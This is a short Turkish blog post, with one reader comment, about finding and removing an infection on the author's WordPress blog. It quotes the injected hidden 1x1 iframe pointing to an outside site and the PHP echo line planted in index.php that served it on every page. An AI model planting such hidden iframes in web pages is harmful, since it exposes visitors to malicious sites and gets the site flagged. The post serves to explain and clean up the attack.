Bugün Sinan Yorulmaz kardeşimin uyarısı ile blogda virüs olduğunun farkına vardım. Virüs nasıl bulaşmış bilmiyorum fakat sitenin kaynak kodlarına kendini yerleştirmiş. Kapadığımız ‘html’ etiketinin hemen altına bu kodu yerleştirip hem kendisi faydalanmış hemde sitemizin adını ‘kötü içerikli site’ ye çıkartmış.
<iframe src="http://internetcountercheck.com/?click=6073953" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
Bende google.com.tr de biraz araştırma yaparak bir, iki sonuca vardım. Kullandığım temanın dosyalarını her ne kadar arasam, tarasamda ‘iframe’ etiketli kodu bulamamıştım. En sonunda wordpress ‘in ‘index.php’ sinde olduğunu farkettim. Kendini dosyaya şu şekilde yerleştirmiş ve her sayfada çıkmayı sağlamış.
echo "<iframe src=\"http://internetcountercheck.com/?click=6073953\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
Bir, iki yararlı dökümantasyon:
Malicious ‘Income’ IFrames from .CN Domains
Gogo2me – Hidden IFrame Injection
Another Type of IFrame Hack (PHP Exploit)








Haziran 3rd, 2009 » 20:23
Saol işe yarayacak bilgiler.